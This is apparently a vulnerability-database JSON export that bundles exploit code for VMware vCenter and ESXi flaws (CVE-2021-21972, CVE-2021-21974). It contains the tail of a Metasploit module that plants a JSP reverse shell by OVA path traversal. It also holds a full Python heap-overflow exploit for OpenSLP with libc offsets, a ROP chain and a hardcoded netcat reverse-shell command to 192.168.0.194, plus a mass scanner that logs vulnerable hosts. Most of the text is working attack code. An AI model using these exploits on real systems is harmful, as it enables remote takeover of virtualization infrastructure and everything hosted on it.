\n], \n[ \n'VMware vCenter Server <= 6.7 Update 3j (Windows)', \n{ \n'Platform' => 'win' \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp', \n'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], \n'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint'] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \n# /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index> \nOptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me \nOptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu \n]) \nend \n \ndef spray_and_pray_min \ndatastore['SprayAndPrayMin'] \nend \n \ndef spray_and_pray_max \ndatastore['SprayAndPrayMax'] \nend \n \ndef spray_and_pray_range \n(spray_and_pray_min..spray_and_pray_max).to_a \nend \n \ndef check \n# Run auxiliary/scanner/vmware/esx_fingerprint \nsuper \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \ncase res.code \nwhen 200 \n# {\"States\":\"[]\",\"Install Progress\":\"UNKNOWN\",\"Config Progress\":\"UNKNOWN\",\"Config Final Progress\":\"UNKNOWN\",\"Install Final Progress\":\"UNKNOWN\"} \nexpected_keys = [ \n'States', \n'Install Progress', \n'Install Final Progress', \n'Config Progress', \n'Config Final Progress' \n] \n \nif (expected_keys & res.get_json_document.keys) == expected_keys \nreturn CheckCode::Vulnerable('Unauthenticated endpoint access granted.') \nend \n \nCheckCode::Detected('Target did not respond with expected keys.') \nwhen 401 \nCheckCode::Safe('Unauthenticated endpoint access denied.') \nelse \nCheckCode::Detected(\"Target responded with code #{res.code}.\") \nend \nend \n \ndef exploit \nupload_ova \npop_thy_shell # ;) \nend \n \ndef upload_ova \nprint_status(\"Uploading OVA file: #{ova_filename}\") \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \ngenerate_ova, \n'application/x-tar', # OVA is tar \n'binary', \n%(form-data; name=\"uploadFile\"; filename=\"#{ova_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'), \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res && res.code == 200 && res.body == 'SUCCESS' \nfail_with(Failure::NotVulnerable, 'Failed to upload OVA file') \nend \n \nregister_files_for_cleanup(*jsp_paths) \n \nprint_good('Successfully uploaded OVA file') \nend \n \ndef pop_thy_shell \njsp_uri = \ncase target['Platform'] \nwhen 'linux' \nnormalize_uri(target_uri.path, \"/ui/resources/#{jsp_filename}\") \nwhen 'win' \nnormalize_uri(target_uri.path, \"/statsreport/#{jsp_filename}\") \nend \n \nprint_status(\"Requesting JSP payload: #{full_uri(jsp_uri)}\") \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri \n) \n \nunless res && res.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to request JSP payload') \nend \n \nprint_good('Successfully requested JSP payload') \nend \n \ndef generate_ova \nova_file = StringIO.new \n \n# HACK: Spray JSP in the OVA and pray we get a shell... \nRex::Tar::Writer.new(ova_file) do |tar| \njsp_paths.each do |path| \n# /tmp/unicorn_ova_dir/../../<path> \ntar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) } \nend \nend \n \nova_file.string \nend \n \ndef jsp_paths \ncase target['Platform'] \nwhen 'linux' \n@jsp_paths ||= spray_and_pray_range.shuffle.map do |idx| \n\"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}\" \nend \nwhen 'win' \n# Forward slashes work here \n[\"/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}\"] \nend \nend \n \ndef ova_filename \n@ova_filename ||= \"#{rand_text_alphanumeric(8..42)}.ova\" \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..42)}.jsp\" \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161695/vmware_vcenter_uploadova_rce.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-18T21:20:22", "description": "Proof of concept exploit for the OpenSLP heap overflow in VMware ESXi versions 7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, and 6.5 before ESXi650-202102101-SG.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "zdt", "title": "VMware ESXi OpenSLP Heap Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21974"], "modified": "2021-06-03T00:00:00", "id": "1337DAY-ID-36348", "href": "https://0day.today/exploit/description/36348", "sourceData": "#!/usr/bin/python3\n######################################################################################################\n# CVE-2021-21974 PoC Exploit\n# By: Johnny Yu (@staight_blast)\n# Tested against:\n# [1] VMware ESXi 6.7.0 build-14320388 ; VMware ESXi 6.7.0 Update 3\n# [2] VMware ESXi 6.7.0 build-16316930 ; VMware ESXi 6.7.0 Update 3\n######################################################################################################\nimport sys\nimport time\nimport trace\nimport queue\nimport struct\nimport socket\nimport threading\n\nIP = sys.argv[1]\n#shell_cmd = b'echo \"pwned\" > /tmp/pwn'\nshell_cmd = b'mknod /tmp/backpipe p ; /bin/sh 0</tmp/backpipe | nc 192.168.0.194 80 1>/tmp/backpipe'\n\nDEBUG = False\nPRINT = True\nLOG_LEAK = False\n\nT = 0.3 #0.4\nPORT = 427\nCOMMAND = 'command'\nMARKER = b'\\xef\\xbe\\xad\\xde'\n\nLISTEN = 0x65\nSTREAM_READ = 0x6c\nSTREAM_WRITE = 0x6f\nSTREAM_READ_FIRST = 0x6d\n\nLISTEN_FD = 0x8\n\nleaked_data = b'\\x00\\x00\\x00\\x00'\nleaked_values = None\n\nclass SLP_Thread(threading.Thread):\n def __init__(self, input_q):\n super(SLP_Thread, self).__init__()\n self.input_q = input_q\n\n def run(self):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n while True:\n try:\n \n data = self.input_q.get(True, 0.05)\n name = threading.current_thread().name.replace('Thread','SLP Client') \n \n if 'connect' == data[COMMAND]:\n if PRINT:\n print('[' + name + '] connect')\n s.connect((IP, PORT)) \n \n elif 'service request' == data[COMMAND]:\n arg1 = data['arg1'] \n outgoing = self.generate_srv_rqst(arg1)\n if PRINT:\n print('[' + name + '] service request')\n s.send(outgoing)\n d = s.recv(1024)\n if PRINT:\n print('[' + name + '] recv: ', d)\n \n elif 'directory agent advertisement' == data[COMMAND]:\n arg1 = data['arg1']\n arg2 = data['arg2']\n outgoing = self.generate_da_advert(arg1, arg2)\n if PRINT:\n print('[' + name + '] directory agent advertisement')\n s.send(outgoing)\n d = s.recv(1024)\n if PRINT:\n print('[' + name + '] recv: ', d)\n \n elif 'service registration' == data[COMMAND]:\n arg1 = data['arg1']\n arg2 = data['arg2']\n arg3 = data['arg3']\n arg4 = data['arg4'] \n outgoing = self.generate_srv_reg(arg1, arg2, arg3, arg4)\n if PRINT:\n print('[' + name + '] service registration')\n s.send(outgoing)\n d = s.recv(1024)\n if PRINT:\n print('[' + name +'] recv: ', d)\n\n elif 'attribute request' == data[COMMAND]:\n arg1 = data['arg1']\n arg2 = data['arg2']\n outgoing = self.generate_attrib_rqst(arg1)\n if PRINT:\n print('[' + name + '] attribute request')\n s.send(outgoing)\n output = b''\n for i in range(0, arg2):\n output += s.recv(1)\n if PRINT:\n print('[' + name + '] recv: ', output)\n \n elif 'recv' == data[COMMAND]:\n output = b''\n arg1 = data['arg1']\n arg2 = data['arg2']\n for i in range(0, arg2):\n output += s.recv(1)\n if arg1:\n print('[' + name + '] recv: ', output)\n \n elif 'leak data' == data[COMMAND]:\n outgoing = b''\n incoming = b''\n arg1 = data['arg1'] \n \n if arg1 > 0:\n \n for i in range(0, arg1):\n outgoing += s.recv(1)\n\n #print(outgoing.hex())\n\n global leaked_data\n leaked_data = outgoing \n \n else:\n\n while True:\n incoming = s.recv(1)\n outgoing += incoming\n if MARKER in outgoing:\n break\n \n global leaked_values\n leaked_values = []\n\n try:\n for i in range(0, len(outgoing), 4):\n v = struct.unpack('<I', outgoing[i : i+4])[0]\n leaked_values.append(v)\n except:\n pass\n\n elif 'close' == data[COMMAND]:\n if PRINT:\n print('[' + name + '] close')\n s.close()\n break\n \n except queue.Empty:\n continue \n\n def generate_slp_header(self, payload, functionid, xid, extoffset):\n packetlen = len(payload) + 16\n if extoffset:\n extoffset += 16\n header = bytearray([2, functionid])\n header.extend(struct.pack('!IH', packetlen, 0)[1:])\n header.extend(struct.pack('!IHH', extoffset, xid, 2)[1:])\n header.extend(b'en')\n return header\n\n def generate_srv_rqst(self, data):\n srvtype = prlist = scopes = predicate = b''\n spi = data\n payload = bytearray(struct.pack('!H', len(prlist)) + prlist)\n payload.extend(struct.pack('!H', len(srvtype)) + srvtype)\n payload.extend(struct.pack('!H', len(scopes)) + scopes)\n payload.extend(struct.pack('!H', len(predicate)) + predicate)\n payload.extend(struct.pack('!H', len(spi)) + spi)\n header = self.generate_slp_header(payload, 1, 5, 0)\n return header + payload\n\n def generate_da_advert(self, url, scopes):\n error_code = 0\n boot_time = int(time.time())\n attributes = spi = auth_blocks = b''\n payload = bytearray(struct.pack('!H', error_code) + struct.pack('!I', boot_time))\n payload.extend(struct.pack('!H', len(url)) + url)\n payload.extend(struct.pack('!H', len(scopes)) + scopes)\n payload.extend(struct.pack('!H', len(attributes)) + attributes)\n payload.extend(struct.pack('!H', len(spi)) + spi)\n payload.extend(struct.pack('!H', len(auth_blocks)) + auth_blocks)\n header = self.generate_slp_header(payload, 8, 0, 0)\n return header + payload\n \n def generate_url_entry(self, url):\n lifetime = 2 * 60 #seconds\n auth_blocks = b''\n payload = bytearray([0])\n payload.extend(struct.pack('!H', lifetime))\n payload.extend(struct.pack('!H', len(url)) + url)\n payload.extend(struct.pack('!B', len(auth_blocks)) + auth_blocks)\n return payload\n \n def generate_srv_reg(self, url, srvtype, scopes, attributes):\n attrib_auth_blocks = b''\n url_entry = self.generate_url_entry(url)\n payload = bytearray(url_entry)\n payload.extend(struct.pack('!H', len(srvtype)) + srvtype)\n payload.extend(struct.pack('!H', len(scopes)) + scopes)\n payload.extend(struct.pack('!H', len(attributes)) + attributes)\n payload.extend(struct.pack('!B', len(attrib_auth_blocks)) + attrib_auth_blocks)\n header = self.generate_slp_header(payload, 3, 20, 0)\n return header + payload\n \n def generate_attrib_rqst(self, url):\n scopes = b'DEFAULT'\n prlist = tags = spi = b''\n payload = bytearray(struct.pack('!H', len(prlist)) + prlist)\n payload.extend(struct.pack('!H', len(url)) + url)\n payload.extend(struct.pack('!H', len(scopes)) + scopes)\n payload.extend(struct.pack('!H', len(tags)) + tags)\n payload.extend(struct.pack('!H', len(spi)) + spi)\n header = self.generate_slp_header(payload, 6, 12, 0)\n return header + payload\n\ndef close():\n time.sleep(T)\n return {'command' : 'close'}\n\ndef connect():\n time.sleep(T)\n return {'command' : 'connect'}\n\ndef service_request(arg1):\n time.sleep(T)\n return {'command' : 'service request', 'arg1' : arg1}\n\ndef da_advert_request(arg1, arg2):\n time.sleep(T)\n return {'command' : 'directory agent advertisement', 'arg1' : arg1, 'arg2' : arg2}\n\ndef service_registration(arg1, arg2):\n time.sleep(T)\n return {'command' : 'service registration', 'arg1' : b'127.0.0.1', 'arg2' : arg1, 'arg3' : b'default', 'arg4' : arg2}\n\ndef attribute_request(arg1, arg2):\n time.sleep(T)\n return {'command' : 'attribute request', 'arg1' : arg1, 'arg2' : arg2}\n\ndef leak_data(arg1 = -1):\n time.sleep(T)\n return {'command' : 'leak data', 'arg1': arg1}\n\ndef overflow_and_extend(size, flag):\n arg1 = b'A' * 24\n arg2 = b'B' * 13 + struct.pack('<H', size + flag) + b':/' + b'C' * 647\n return da_advert_request(arg1, arg2)\n\ndef update_target_slpdsocket(fd, size, state):\n payload = b'\\xd0\\x00\\x00\\x00'\n payload += b'\\x00' * 8 + b'\\xbe\\xba\\xfe\\xca'\n payload += struct.pack('<I', fd)\n payload += b'\\x00' * 4\n payload += struct.pack('<I', state)\n payload += b'\\x00' * 12\n payload += b'\\x02\\x00\\x00\\x00'\n payload += b'\\x7f\\x00\\x00\\x01'\n payload += b'\\x00' * 8\n filler = b'A' * (size - 0x76)\n return service_request(filler + payload)\n\ndef partial_update_target_send_buffer(size, send_buffer_size, flag, data):\n payload = struct.pack('<I', send_buffer_size + flag)\n payload += b'\\x00' * 8\n payload += struct.pack('<I', send_buffer_size - 0x20)\n payload += data #b'\\x00' * 2\n filler = b'A' * (size - 0x56)\n return service_request(filler + payload)\n\ndef update_target_send_buffer(size, send_buffer_size, flag, address, length):\n payload = struct.pack('<I', send_buffer_size + flag)\n payload += b'\\x00' * 8\n payload += struct.pack('<I', send_buffer_size - 0x20)\n payload += struct.pack('<I', address) * 2\n payload += struct.pack('<I', address + length)\n payload += b'\\x00' * 0x10\n filler = b'A' * (size - 0x66)\n return service_request(filler + payload)\n\ndef update_target_recv_buffer(size, address):\n size += 0x1a\n payload = b'\\x40\\x00\\x00\\x00'\n payload += b'\\x00' * 8\n payload += struct.pack('<I', size)\n payload += struct.pack('<I', address - 26) * 2 + struct.pack('<I', address - 26 + size) \n filler = b'A' * 0xca\n return service_request(filler + payload)\n\ndef block(size):\n if size > 0x38:\n size = size - 0x38\n else:\n size = 1\n return service_request(b'A' * size)\n\ndef breakpoint():\n time.sleep(T)\n input('breakpoint')\n\ndef exploit():\n count = 60\n requests = [0]\n slpclients = [0]\n\n global leaked_data\n global leaked_values\n\n requests.extend([queue.Queue() for i in range(1, count)])\n slpclients.extend([SLP_Thread(input_q = requests[i]) for i in range(1, count)])\n\n for i in range(1, count):\n slpclients[i].start()\n\n requests[1].put(connect())\n requests[1].put(da_advert_request(b'roflmao://pwning', b'BBB'))\n\n requests[2].put(connect())\n requests[3].put(connect())\n requests[4].put(connect())\n requests[5].put(connect())\n\n requests[2].put(block(0x40))\n requests[3].put(block(0x40))\n requests[4].put(block(0x40))\n requests[5].put(block(0x40))\n\n requests[6].put(connect())\n requests[6].put(block(0x810))\n requests[7].put(connect())\n requests[8].put(connect())\n requests[6].put(close())\n requests[9].put(connect())\n requests[9].put(overflow_and_extend(0x140, 0x1))\n fd = 0xc\n requests[8].put(update_target_slpdsocket(fd, 0x140, STREAM_READ_FIRST))\n requests[7].put(service_registration(b'service:pwn', MARKER + b'B' * (0x3200 - 21 - 4)))\n requests[8].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN))\n requests[10].put(connect())\n requests[10].put(block(0x70))\n\n requests[11].put(connect())\n requests[12].put(connect())\n requests[13].put(connect())\n requests[11].put(block(0x810))\n requests[14].put(connect())\n requests[14].put(block(0x160))\n requests[12].put(block(0x810))\n requests[14].put(close())\n requests[15].put(connect())\n requests[15].put(attribute_request(b'service:pwn', 0x20))\n\n requests[13].put(block(0x110))\n requests[16].put(connect())\n requests[17].put(connect())\n\n requests[12].put(close())\n requests[18].put(connect())\n requests[18].put(overflow_and_extend(0x120, 0x3))\n requests[17].put(partial_update_target_send_buffer(0x120, 0x3220, 0x1, b'\\x00\\x00'))\n requests[19].put(connect())\n requests[19].put(block(0x178))\n\n requests[11].put(close())\n requests[20].put(connect())\n requests[20].put(overflow_and_extend(0x140, 0x1))\n fd = 0x11\n requests[16].put(update_target_slpdsocket(fd, 0x140, STREAM_WRITE))\n requests[16].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN))\n requests[21].put(connect())\n requests[21].put(block(0x178))\n requests[15].put(leak_data())\n\n time.sleep(T + 1.0)\n\n heap_address = 0\n libc_base_address = 0\n\n if leaked_values == None:\n print(\"[-] Exploit Failed [-]\")\n return -1\n\n leaked_values = leaked_values[::-1]\n\n if LOG_LEAK: \n for i in leaked_values:\n print(hex(i))\n \n if leaked_values[0] == 0xdeadbeef:\n heap_address = leaked_values[6] - 0x3220 + 0x4\n \n elif leaked_values[0] == 0xefeb3174:\n heap_offset = 0x2b1 if leaked_values[42] == 0x42424242 else 0x5d61\n heap_address = leaked_values[14] + heap_offset\n \n libc_leak_location = heap_address - 0x100 + 4\n \n requests[22].put(connect())\n requests[22].put(block(0x810))\n requests[23].put(connect())\n requests[23].put(block(0x100))\n requests[24].put(connect())\n requests[24].put(block(0x810))\n requests[23].put(close())\n requests[25].put(connect())\n requests[25].put(block(0x698))\n\n requests[27].put(connect())\n requests[28].put(connect())\n\n requests[24].put(close())\n requests[26].put(connect())\n requests[26].put(overflow_and_extend(0x130, 0x1))\n requests[27].put(update_target_send_buffer(0x130, 0x598, 0x1, libc_leak_location, 0x4))\n requests[29].put(connect())\n requests[29].put(block(0x178))\n \n requests[22].put(close())\n requests[30].put(connect())\n requests[30].put(overflow_and_extend(0x140, 0x1)) \n fd = 0x15\n requests[28].put(update_target_slpdsocket(fd, 0x140, STREAM_WRITE))\n requests[28].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN))\n requests[31].put(connect())\n requests[31].put(block(0x178))\n requests[25].put(leak_data(0x4))\n \n time.sleep(T + 1.0)\n libc_base_address = struct.unpack('<I', leaked_data)[0] - 0x193568\n\n libc_ret_offset = 0x0008009c\n libc_system_offset = 0x0003e390\n libc_environ_offset = 0x00194e20\n libc___free_hook_offset = 0x001948d8\n libc_ret_address = libc_base_address + libc_ret_offset\n libc_system_address = libc_base_address + libc_system_offset\n libc_environ_address = libc_base_address + libc_environ_offset\n libc___free_hook_address = libc_base_address + libc___free_hook_offset\n shell_cmd_address = heap_address + 0x34\n\n gadget_offset = 0x0007fe01 # add esp, 0x100 ; ret\n gadget_address = libc_base_address + gadget_offset\n\n requests[27].put(update_target_send_buffer(0x130, 0x598, 0x1, libc_environ_address, 0x4))\n requests[28].put(update_target_slpdsocket(fd, 0x140, STREAM_WRITE))\n requests[25].put(leak_data(0x4))\n \n time.sleep(T + 1.0)\n stack_environ_address = struct.unpack('<I', leaked_data)[0]\n esp_offset = 0xe30 if sys.argv[2] == '1' else 0xe7c\n esp_value = stack_environ_address - esp_offset\n pivoted_esp_value = esp_value + 0x100\n\n print()\n print('[+] libc base address: ', hex(libc_base_address))\n print(\"[+] libc system address: \", hex(libc_system_address))\n print(\"[+] libc environ address: \", hex(libc_environ_address))\n print(\"[+] libc __free_hook address: \", hex(libc___free_hook_address))\n print(\"[+] ret address: \", hex(libc_ret_address))\n print(\"[+] gadget address: \", hex(gadget_address))\n print('[+] heap address: ', hex(heap_address))\n print(\"[+] shell command address: \", hex(shell_cmd_address))\n print(\"[+] stack enviorn address: \", hex(stack_environ_address))\n print(\"[+] esp value: \", hex(esp_value))\n print(\"[+] pivoted esp value: \", hex(pivoted_esp_value))\n print()\n\n requests[28].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN))\n \n requests[32].put(connect())\n requests[32].put(block(0x810))\n requests[33].put(connect())\n requests[34].put(connect())\n requests[34].put(block(0x810))\n requests[33].put(block(0x100))\n \n requests[35].put(connect())\n requests[36].put(connect())\n\n requests[34].put(close())\n requests[37].put(connect())\n requests[37].put(overflow_and_extend(0x120, 0x3))\n requests[36].put(update_target_recv_buffer(0x4, shell_cmd_address))\n requests[38].put(connect())\n requests[38].put(block(0x178))\n \n requests[32].put(close())\n requests[39].put(connect())\n requests[39].put(overflow_and_extend(0x140, 0x1))\n requests[35].put(update_target_slpdsocket(LISTEN_FD, 0x140, LISTEN))\n requests[40].put(connect())\n requests[40].put(block(0x178)) \n\n fd = 0x1a\n payload = shell_cmd + b'\\x00'\n requests[36].put(update_target_recv_buffer(len(payload), shell_cmd_address))\n requests[35].put(update_target_slpdsocket(fd, 0x140, STREAM_READ))\n requests[33].put(service_request(payload))\n \n payload = struct.pack('<I', libc_ret_address) * 10 + struct.pack('<I', libc_system_address) + b'\\x41' * 4 + struct.pack('<I', shell_cmd_address)\n requests[36].put(update_target_recv_buffer(len(payload), pivoted_esp_value - 0x10)) \n requests[35].put(update_target_slpdsocket(fd, 0x140, STREAM_READ))\n requests[33].put(service_request(payload))\n \n #breakpoint()\n \n payload = b'\\x41\\x41\\x41\\x41' if DEBUG == True else struct.pack('<I', gadget_address)\n requests[36].put(update_target_recv_buffer(len(payload), libc___free_hook_address))\n requests[35].put(update_target_slpdsocket(fd, 0x140, STREAM_READ))\n requests[33].put(service_request(payload))\n\n time.sleep(T + 1.0) \n print('[*] exploit deployed')\n return 0\n\ndef intro():\n print(\" _____ _____ ___ __ ___ _ ___ _ ___ ____ _ _ \")\n print(\" / __\\ \\ / / __|_|_ ) \\_ ) |__|_ ) / _ \\__ | | | \")\n print(\" | (__ \\ V /| _|___/ / () / /| |___/ /| \\_, / / /|_ _| \")\n print(\" \\___| \\_/ |___| /___\\__/___|_| /___|_|/_/ /_/ |_| \")\n print()\n print(\" PoC Exploit \")\n print()\n print(\" vuln discovered by: Lucas Leong (@_wmliang_) \")\n print(\" poc by: Johnny Yu (@straight_blast) \")\n print(\" \")\n print()\n print(\" currently support the following: \")\n print(\" [1] VMware ESXi 6.7.0 build-14320388 \")\n print(\" [2] VMware ESXi 6.7.0 build-16316930 \")\n print()\n\nif __name__ == '__main__':\n intro() \n exploit()\n", "sourceHref": "https://0day.today/exploit/36348", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-27T01:31:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "zdt", "title": "VMware vCenter 6.5 / 7.0 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-02-24T00:00:00", "id": "1337DAY-ID-35863", "href": "https://0day.today/exploit/description/35863", "sourceData": "#-*- coding:utf-8 -*-\nbanner = \"\"\"\n 888888ba dP \n 88 `8b 88 \n a88aaaa8P' .d8888b. d8888P .d8888b. dP dP \n 88 `8b. 88' `88 88 Y8ooooo. 88 88 \n 88 .88 88. .88 88 88 88. .88 \n 88888888P `88888P8 dP `88888P' `88888P' \n ooooooooooooooooooooooooooooooooooooooooooooooooooooo \n @time:2021/02/24 CVE-2021-21972.py\n C0de by NebulabdSec - @batsu \n \"\"\"\nprint(banner)\n\nimport threadpool\nimport random\nimport requests\nimport argparse\nimport http.client\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nhttp.client.HTTPConnection._http_vsn = 10\nhttp.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'\n\nTARGET_URI = \"/ui/vropspluginui/rest/services/uploadova\"\n\ndef get_ua():\n first_num = random.randint(55, 62)\n third_num = random.randint(0, 3200)\n fourth_num = random.randint(0, 140)\n os_type = [\n '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',\n '(Macintosh; Intel Mac OS X 10_12_6)'\n ]\n chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)\n\n ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',\n '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']\n )\n return ua\n\ndef CVE_2021_21972(url):\n proxies = {\"scoks5\": \"http://127.0.0.1:1081\"}\n headers = {\n 'User-Agent': get_ua(),\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n targetUrl = url + TARGET_URI\n try:\n res = requests.get(targetUrl,\n headers=headers,\n timeout=15,\n verify=False,\n proxies=proxies)\n # proxies={'socks5': 'http://127.0.0.1:1081'})\n # print(len(res.text))\n if res.status_code == 405:\n print(\"[+] URL:{}--------\u5b58\u5728CVE-2021-21972\u6f0f\u6d1e\".format(url))\n # print(\"[+] Command success result: \" + res.text + \"\\n\")\n with open(\"\u5b58\u5728\u6f0f\u6d1e\u5730\u5740.txt\", 'a') as fw:\n fw.write(url + '\\n')\n else:\n print(\"[-] \" + url + \" \u6ca1\u6709\u53d1\u73b0CVE-2021-21972\u6f0f\u6d1e.\\n\")\n # except Exception as e:\n # print(e)\n except:\n print(\"[-] \" + url + \" Request ERROR.\\n\")\ndef multithreading(filename, pools=5):\n works = []\n with open(filename, \"r\") as f:\n for i in f:\n func_params = [i.rstrip(\"\\n\")]\n # func_params = [i] + [cmd]\n works.append((func_params, None))\n pool = threadpool.ThreadPool(pools)\n reqs = threadpool.makeRequests(CVE_2021_21972, works)\n [pool.putRequest(req) for req in reqs]\n pool.wait()\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\",\n \"--url\",\n help=\"Target URL; Example:http://ip:port\")\n parser.add_argument(\"-f\",\n \"--file\",\n help=\"Url File; Example:url.txt\")\n # parser.add_argument(\"-c\", \"--cmd\", help=\"Commands to be executed; \")\n args = parser.parse_args()\n url = args.url\n # cmd = args.cmd\n file_path = args.file\n if url != None and file_path ==None:\n CVE_2021_21972(url)\n elif url == None and file_path != None:\n multithreading(file_path, 10) # \u9ed8\u8ba415\u7ebf\u7a0b\n\nif __name__ == \"__main__\":\n main()\n", "sourceHref": "https://0day.today/exploit/35863", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-27T13:45:10", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-25T00:00:00", "type": "zdt", "title": "VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-06-25T00:00:00", "id": "1337DAY-ID-36472", "href": "https://0day.today/exploit/description/36472", "sourceData": "# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: CHackA0101\n# Vendor Homepage: https://kb.vmware.com/s/article/82374\n# Software Link: https://www.vmware.com/products/vcenter-server.html\n# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)\n# CVE: 2021-21972\n\n# More Info: 